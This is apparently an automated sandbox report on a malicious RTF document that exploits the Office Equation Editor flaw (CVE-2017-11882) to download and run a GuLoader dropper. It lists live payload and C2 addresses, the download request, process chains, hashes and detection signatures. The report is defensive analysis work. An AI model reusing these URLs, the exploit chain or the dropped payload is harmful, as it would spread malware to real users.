Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
A3hamzfUkW

Overview

General Information

Sample Name:A3hamzfUkW (renamed file extension from none to rtf)
Analysis ID:561311
MD5:30e90b61102da9d9132f6ccbfd286b73
SHA1:949578725228909ffff575b8e2a7b397e6097585
SHA256:084f59705fb0a98883454b511a2939f6ed91e9c04b7a2d7f8cb13ec834ec5215
Tags:rtf
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2688 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 2976 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 984 cmdline: "C:\Users\Public\vbc.exe" MD5: 6EA8ECF670ED24734A3BE72B69BC5FD9)
  • cleanup
{"Payload URL": "https://konutmarket.com/2022file_kLVMf"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Exploits

    barindex
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 172.245.119.43, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2976, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2976, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2976, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 984
    Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2976, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 984

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://konutmarket.com/2022file_kLVMf"}
    Source: A3hamzfUkW.rtfVirustotal: Detection: 50%Perma Link
    Source: A3hamzfUkW.rtfReversingLabs: Detection: 39%
    Source: A3hamzfUkW.rtfAvira: detected
    Source: http://172.245.119.43/2200/vbc.exeAvira URL Cloud: Label: malware
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AEC18FB7-289C-4590-8608-E6589FAB5ACE}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen

    Exploits

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405C49
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00406873 FindFirstFileW,FindClose,4_2_00406873
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040290B FindFirstFileW,4_2_0040290B
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.119.43:80
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.119.43:80

    Networking

    barindex
    Source: Malware configuration extractorURLs: https://konutmarket.com/2022file_kLVMf
    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
    Source: Joe Sandbox ViewIP Address: 172.245.119.43 172.245.119.43
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jan 2022 09:45:44 GMTServer: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27Last-Modified: Tue, 25 Jan 2022 15:51:44 GMTETag: "17728-5d66a0fd4b996"Accept-Ranges: bytesContent-Length: 96040Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 04 00 00 04 00 00 65 e3 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 28 0e 00 00 00 00 00 00 00 00 00 00 a0 62 01 00 88 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 28 0e 00 00 00 c0 04 00 00 10 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: GET /2200/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.119.43Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: vbc.exe.2.dr, vbc[1].exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: vbc.exe.2.dr, vbc[1].exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: vbc.exe.2.dr, vbc[1].exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: vbc.exe.2.dr, vbc[1].exe.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: vbc.exe.2.dr, vbc[1].exe.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: vbc.exe.2.dr, vbc[1].exe.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: vbc.exe, 00000004.00000000.415058123.000000000040A000.00000008.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, vbc[1].exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: vbc.exe.2.dr, vbc[1].exe.2.drString found in binary or memory: http://ocsp.digicert.com0C
    Source: vbc.exe.2.dr, vbc[1].exe.2.drString found in binary or memory: http://ocsp.digicert.com0O
    Source: vbc.exe.2.dr, vbc[1].exe.2.drString found in binary or memory: http://www.digicert.com/CPS0
    Source: vbc.exe.2.dr, vbc[1].exe.2.drString found in binary or memory: https://www.digicert.com/CPS0
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EA13411A-D846-4185-AA36-2A58C910FC07}.tmpJump to behavior
    Source: global trafficHTTP traffic detected: GET /2200/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.119.43Connection: Keep-Alive
    Source: C:\Users\Public\vbc.exeCode function: 4_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_004056DE

    System Summary

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_0040352D
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040755C4_2_0040755C
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00406D854_2_00406D85
    Source: C:\Users\Public\vbc.exeCode function: 4_2_73281BFF4_2_73281BFF
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F573A4_2_036F573A
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F45614_2_036F4561
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F43754_2_036F4375
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F575E4_2_036F575E
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F773F4_2_036F773F
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F5B0C4_2_036F5B0C
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F61094_2_036F6109
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F3DE74_2_036F3DE7
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F79D34_2_036F79D3
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F43A34_2_036F43A3
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F71874_2_036F7187
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F57834_2_036F5783
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F746E4_2_036F746E
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F56524_2_036F5652
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F76514_2_036F7651
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F70224_2_036F7022
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F3C304_2_036F3C30
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F3EC44_2_036F3EC4
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F40DD4_2_036F40DD
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F6EAF4_2_036F6EAF
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F40B84_2_036F40B8
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F3E9D4_2_036F3E9D
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F573A NtAllocateVirtualMemory,4_2_036F573A
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F575E NtAllocateVirtualMemory,4_2_036F575E
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F57F0 NtAllocateVirtualMemory,4_2_036F57F0
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F5783 NtAllocateVirtualMemory,4_2_036F5783
    Source: ~WRF{AEC18FB7-289C-4590-8608-E6589FAB5ACE}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
    Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: A3hamzfUkW.rtfVirustotal: Detection: 50%
    Source: A3hamzfUkW.rtfReversingLabs: Detection: 39%
    Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
    Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_0040352D
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$hamzfUkW.rtfJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE426.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.winRTF@4/12@0/1
    Source: C:\Users\Public\vbc.exeCode function: 4_2_004021AA CoCreateInstance,4_2_004021AA
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,4_2_0040498A
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: ~WRF{AEC18FB7-289C-4590-8608-E6589FAB5ACE}.tmp.0.drInitial sample: OLE indicators vbamacros = False

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\Public\vbc.exeCode function: 4_2_732830C0 push eax; ret 4_2_732830EE
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F6758 pushfd ; retf 4_2_036F6761
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F512D pushfd ; retf 4_2_036F66A9
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F2502 push esp; ret 4_2_036F2503
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F0FF6 push D02B8C97h; retf 4_2_036F1003
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F678F pushfd ; retf 4_2_036F67AF
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F2E5E push ecx; iretd 4_2_036F2E5F
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F502D pushfd ; retf 4_2_036F67AF
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F3806 push ds; ret 4_2_036F3810
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F4EF3 pushfd ; retf 4_2_036F6761
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F4EF3 pushfd ; retf 4_2_036F67AF
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F50CF pushfd ; retf 4_2_036F66A9
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F62A0 push ebx; retf 4_2_036F62AD
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F66B8 pushfd ; retf 4_2_036F66C6
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F50B5 pushfd ; retf 4_2_036F66C6
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F50B5 pushfd ; retf 4_2_036F66E3
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F669B pushfd ; retf 4_2_036F66A9
    Source: C:\Users\Public\vbc.exeCode function: 4_2_73281BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,4_2_73281BFF
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nspDD94.tmp\System.dllJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

    Boot Survival

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
